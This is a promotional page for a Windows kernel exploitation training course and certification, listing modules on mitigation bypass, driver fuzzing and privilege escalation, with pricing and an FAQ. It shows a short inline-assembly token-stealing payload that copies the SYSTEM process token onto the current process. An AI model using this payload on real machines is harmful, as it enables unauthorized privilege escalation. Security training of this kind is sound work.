From User Mode Exploitation to Ring 0 Research

The training that turns security practitioners into Windows kernel researchers. Build a hypervisor lab, study modern mitigations, construct exploit primitives, and understand ring 0 internals where most people stop reading the documentation.

See Pricing & Enroll What You'll Learn
6
Deep Modules
100+
Hours of Content
30+
Kernel Labs
Lifetime Access

What You Will Actually Be Able To Do

This isn't a slideshow with diagrams. After completing this training, these are real, demonstrable research skills you'll own.

Set up a hypervisor-based kernel debugging lab with WinDbg, snapshot automation, and driver instrumentation

Navigate ntoskrnl.exe, understand EPROCESS/ETHREAD structures, and trace system calls through SSDT to kernel handlers

Study and reproduce bypass techniques for KASLR, SMEP, SMAP, kCFG, HVCI in isolated lab environments

Construct read/write primitives from real vulnerability classes - pool overflows, type confusion, race conditions in controlled research labs

Fuzz kernel drivers with kAFL, Syzkaller, and custom harnesses, then triage crashes into exploitability assessments

Analyze kernel callback mechanisms (ETW, ObRegisterCallbacks, Registry) to understand defender architecture and EDR design

Build full privilege escalation chains in lab: from initial driver vulnerability to SYSTEM and understand every step between

Understand VBS, PPL, and Credential Guard architecture: boundaries, trust levels, and what is realistically attackable vs. what isn't

How This Training Is Different

Built by kernel researchers, not course factories. Every lab was debugged on a real target.

Hypervisor-Based Debugging

Your lab runs on a proper hypervisor with snapshot management, kernel debugging over serial, and automated reset. No "install a VM and figure it out."

Kernel Instrumentation

You'll use Driver Verifier, kernel sanitizers, ETW tracing, and custom monitoring to observe exactly what happens at ring 0 before, during, and after each exercise.

Real Vulnerable Drivers

HEVD, custom-built vulnerable drivers, and real-world driver patterns. You research actual IOCTLs and attack surfaces, not contrived CTF challenges.

Primitive Construction

You don't just "run an exploit." You build read/write primitives from scratch, chain them, handle edge cases, and understand kernel state restoration.

The CWRE Certification

The Certified Windows Research & Exploitation (CWRE) is an advanced certification for security researchers who operate at the kernel level.

You build a lab, learn the internals, study the mitigations, write the primitives. Then you prove it in an exam against a hardened target.

  • 100+ Hours of Technical Content
  • Private Research Community (Discord)
  • 30+ Hands-on Kernel Labs
  • Lifetime Access & Curriculum Updates
  • 1 Exam Voucher Included
exploit.c - token_steal
// Token Stealing Primitive - Windows 11 24H2 Lab
#include <ntddk.h>
 
void TokenStealingPayload() {
__asm {
push rax
mov  rax, gs:[188h]   ; _KTHREAD
mov  rax, [rax+0xB8]  ; _EPROCESS
mov  rcx, rax ; Save current
 
__find_system:
mov  rax, [rax+0x1d8] ; ActiveProcessLinks
sub  rax, 0x1d8
cmp  [rax+0x1d0], 4  ; PID == 4 (SYSTEM)
jne  __find_system
 
mov  rdx, [rax+0x4B8] ; SYSTEM Token
mov  [rcx+0x4B8], rdx ; Overwrite ours
pop  rax
}
}

What's Included

100+ Hours of Video

Recorded screen-share lectures with WinDbg, IDA Pro, and live kernel debugging. No slides-only modules.

30+ Kernel Labs

Each lab comes with a pre-configured VM snapshot, step-by-step instructions, and expected output. You bring the hypervisor, we provide the images.

Written Guides & Source

Every lecture has a companion written guide with annotated code, struct offsets, and WinDbg commands you can copy-paste.

Discord Community

Private research community. Ask questions, share findings, get unstuck. Best-effort instructor support typically within 24h.

CWRE Exam Voucher

48-hour exam. Hands-on, no multiple choice. No prerequisites beyond course completion.

Lifetime Updates

New Windows builds, new mitigations, new techniques all added to the course. One payment, no recurring fees.

Is This Training For You?

This is for you if

  • You're a pentester or red teamer who wants to understand kernel-level security research
  • You're a reverse engineer comfortable with IDA/Ghidra and want to target kernel components
  • You understand C, x86-64 assembly, and basic OS concepts - and want to apply them at ring 0
  • You're preparing for elite offensive security certifications (OSEE-level and above)
  • You're a security developer who needs to understand how kernel-level attacks work
  • You're a student who wants a structured, deep path into Windows internals research

This is NOT for you if

  • You've never written C code or read disassembly - start there first
  • You're looking for a beginner-friendly "intro to hacking" course
  • You want pre-built tools to use without understanding internals
  • You expect walkthroughs without hands-on lab work
  • You're not willing to spend hours in WinDbg analyzing memory layouts

Curriculum Overview

6 modules. Lab to research-grade primitives. Each one builds on the last.

Module 1

Building a Secure Kernel Research Lab

  • Hypervisor setup, kernel debugging over serial, snapshot automation
  • WinDbg configuration, IDA Pro / Ghidra toolchain, Driver Build Environment
  • Deploying HEVD & custom vulnerable drivers for lab exercises
Module 2

Windows Internals Deep Dive

  • NT architecture, ntoskrnl.exe, HAL, win32k.sys
  • EPROCESS, ETHREAD, virtual memory, kernel pools, SSDT
  • Driver model, IRP processing, IOCTL attack surface analysis
Module 3

Kernel Mitigations & Bypass (Part 1)

  • KASLR internals & information leak techniques, stack cookies, kernel DEP
  • SMEP internals & bypass research via ROP, CR4, PTE manipulation
  • Pool hardening, grooming strategies, primitive construction
Module 4

Kernel Mitigations & Bypass (Part 2)

  • SMAP, kCFG, kCET, XFG, internals and bypass research
  • VBS, HVCI, KDP, data-only research when code execution is mitigated
  • Primitive chaining methodology in lab environments
Module 5

Kernel Fuzzing & Reverse Engineering

  • kAFL, Syzkaller, custom fuzzers setup, harnessing, corpus strategy
  • Static RE of drivers, IOCTL handler reversing, binary diffing
  • Crash triage, root cause analysis, exploitability assessment
Module 6

Kernel Primitives & Post-Exploitation Research

  • Privilege escalation primitives, kernel callback analysis (ETW, Ob, Registry)
  • Data-only post-exploitation techniques, kernel state management
  • Full chain construction & published case study teardowns
View Full Detailed Curriculum

Pricing

One payment. Lifetime access. All future updates included.

Early Access
Save $999
$1,499 USD
$500 USD
Early Access pricing - price will increase after launch
  • 100+ hours of content & debugging
  • kernel labs with pre-configured VM snapshots
  • Written guides with annotated source code
  • Private Discord research community
  • CWRE exam voucher (48h exam)
  • Lifetime access & all future curriculum updates
Enroll Now

Frequently Asked Questions

You should be comfortable writing C code, reading x86-64 disassembly, and using a debugger. Basic understanding of OS concepts (processes, memory, syscalls) is assumed. This is not a beginner course.

A host machine running Windows 10/11 or Linux with a Type-2 hypervisor (VMware Workstation or Hyper-V). Minimum 16GB RAM recommended, 32GB ideal. You'll run nested VMs for kernel debugging. We provide the lab VM images.

At a steady pace (10–15 hours/week), expect 3–4 months to complete all modules and labs. You have lifetime access, so you can go at your own speed. The exam can be taken anytime after course completion.

The CWRE exam is a 48-hour, hands-on assessment. No multiple choice. You receive a hardened target and must demonstrate real exploitation research skills

You get access to a private Discord server with other students and instructors. Support is best-effort, typically within 24 hours. Early Access students also get direct access to the course author for technical questions.

No. Security developers, driver developers, and anyone who needs to understand Windows kernel internals will benefit. The research methodology applies whether you're building defenses or analyzing attack techniques.

Early Access

We're building this for a small group of serious researchers, not for volume. Early enrollees get direct access to instructors, priority lab support, and influence over curriculum updates.

Lifetime access. No subscription.

Join the Academy
Enroll Now — Early Access